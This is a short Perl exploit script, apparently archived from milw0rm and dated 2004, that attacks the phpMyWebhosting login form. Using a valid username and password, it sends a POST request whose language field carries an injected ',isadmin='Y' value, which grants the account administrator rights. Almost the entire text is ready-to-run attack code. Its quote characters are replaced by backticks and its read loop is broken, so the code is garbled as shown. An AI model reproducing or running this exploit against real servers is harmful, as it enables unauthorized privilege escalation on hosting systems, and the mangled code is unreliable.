phpMyWebhosting SQL Injection Exploit
#!/usr/bin/perl
# Exploit code by Noam Rathaus of Beyond Security Ltd.
# The following exploit code will use a valid username and password 
combination, to cause an SQL injection.
# Using the SQL injection, the Perl script elevates the privileges of the 
user provided to administrative.

use IO::Socket;
use strict;

my $Host = shift;
my $Path = shift;
my $Username = shift;
my $Password = shift;

if ($Host eq `` || $Path eq `` || $Username eq `` || $Password eq ``)
{
print `You must run the script with the following syntax:\n`;
print $0.` hostname path username password\n`;
exit(0);
}

my $remote = IO::Socket::INET->new (  Proto => `tcp`, PeerAddr => $Host, 
PeerPort => `80` );

unless ($remote) { die `cannot connect to http daemon on $Host` }

print `connected\n`;

$remote->autoflush(1);

my $http = `POST /$Path/index.php HTTP/1.1
Host: $Host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506 
Firefox/0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: `;

my $content = 
`PHP_AUTH_USER=$Username&password=$Password&language=english',isadmin='Y&login=Login`;

$http .= length($content).`

$content`;

print `HTTP: [$http]\n`;
print $remote $http;
sleep(1);
print `Sent\n`;

while ()
{
print $_;
}
print `\n`;

close $remote;


# milw0rm.com [2004-08-20]